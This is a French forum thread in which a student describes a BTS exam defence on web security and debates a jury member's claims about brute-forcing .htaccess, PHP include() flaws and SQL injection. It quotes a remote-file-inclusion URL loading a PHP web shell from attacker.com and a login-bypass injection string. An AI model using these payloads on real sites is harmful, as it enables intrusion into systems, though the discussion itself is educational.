BTS IG Informatique de Gestion

Newbiiiie Messages: 7

Bonjour à tous ! Je m'adresse plus particulièrement aux amateurs/professionnels de la sécurité informatique.
J'ai passé ma soutenance, il y avait bien un "professionnel", un prof d'info et un prof de français, normal !

Voilà, j'ai présenté un sujet et dedans j'avais une partie sur la sécurité web :

Le "professionnel" (oui entre guillemets j'insiste bien) m'a sortit les "affirmations" suivantes :

1) Un .htaccess est détournable grâce à la méthode brute-force
2) Concernant la faille Include(), on ne peut inclure une backdoor en Php étant stocké sur un autre serveur, du genre http://victime.com/index.php?page=http://attacker.com/r57sh.php
3) La requête SQL sur PhpMyAdmin suivante ne fonctionne pas "SELECT * FROM Users WHERE LoginUser = '' OR 1=1 # AND PassUser = '$password'"
car il manque un point-virgule.

1) La méthode brute-force ça existe encore ? Sans compter que pour se faire repérer c'est le meilleur moyen.

2) La faille include , certes vieille mais elle existe encore, permet bien d'inclure une backdoor stockée sur un autre serveur !

3) Je viens de tester encore à l'instant la requête sous PhpMyAdmin sans le ";" et cela fonctionne niquel.

Je ne suis pas un pro de la sécurité web, je connais juste quelque bases, rassurez-moi, ce "professionnel" est complètement obsolète ? Merci de votre attention envers ce post !

Webmaster Sexe: Messages: 5584 Localisation: Montpellier

1) La méthode de brute-force, certes est ancestrale, mais vu qu'elle fonctionne, pourquoi s'en priver ? D'où l'intérêt de mettre des mots de passe complexes, pour que justement, le temps qu'une personne le trouve, on se soit rendu compte qu'on est en train de tenter de se loguer frauduleusement

2) La faille include(), là j'ai envie de dire que ca dépend surtout du code qu'il y a dans la page. Si par exemple dans le code source, le codeur est assez con pour passer en paramètre l'url du fichier à "inclure", oui, ça fonctionnera.

3) Je pense que là il chipote un peu. En fait dans la norme SQL, on mets le ; pour exécuter la requête. Donc en l'état, celle-ci ne serait pas exécutée, mais c'est tout.
Après tout dépend de l'interpréteur SQL et en l'occurrence pour PhpMyAdmin, le fait de cliquer sur le bouton "Exécuter" rajoute en quelque sorte le ;
Donc dire que ca ne fonctionne pas et que la requête est fausse, c'est un peu exagéré.

Newbiiiie Messages: 7

Haaaa merci Vincent ! Ok pour le .htaccess, c'est sûre il faut un bon mot de passe ^^

Pour la faille Include, j'ai présenté un code non sécurisé et sécurisé pour montrer les différences et comment s'en protéger, mais pour lui ce n'est pas possible.

Pour l'injection, j'ai bien dis mots pour mots "cette requête est exécutée à partir de PhpMyAdmin donc le ";" est facultatif" donc oui il a chipoté :/ surtout que j'ai aussi fait du SQL en mode lignes de commandes, donc là oui le ";" est obligatoire.

Par contre ma note ... le prof d'info ne s'est pas prononcé du début à la fin et le prof de français n'a pas pu en placer une !

Forumeur fréquent Messages: 73

Citation:

Par contre ma note ... le prof d'info ne s'est pas prononcé du début à la fin et le prof de français n'a pas pu en placer une !

Bwarf, tu n'auras pas une mauvaise note pour autant :]

Lors de ma soutenance de BTS, j'ai présenté un projet un peu compliqué (du Java, une application utilisable seulement avec un ERP). La prof de français était totalement larguée, elle n'a pas manqué de faire la remarque à sa collègue. Il n'empêche, j'ai eu 18 Very Happy

. La prof d'info était enthousiasmée, je connaissais plutôt bien le sujet, il faut dire. Bref.

C'est peut-être une bonne chose, au final, que le professionnel ait chipoté : ça sous-entend peut-être qu'à part ces maigres détails, il n'a pas pu trouver de faille (hehe) à ton exposé !

Newbiiiie Messages: 7

Merci Ouarf pour ta réponse, bah je pense que c'est bon signe, un prof (qui est jury aussi) m'a dit qu'au contraire ça leur a plu mais sans m'en dire +, après un autre de ma section qui est 1er et qui avait un sujet béton s'est fait exploser aussi :/ Bon signe ? j'espère ouais lol en tout cas 18 bravo ^^ ça fait pas mal de points coeff 4 !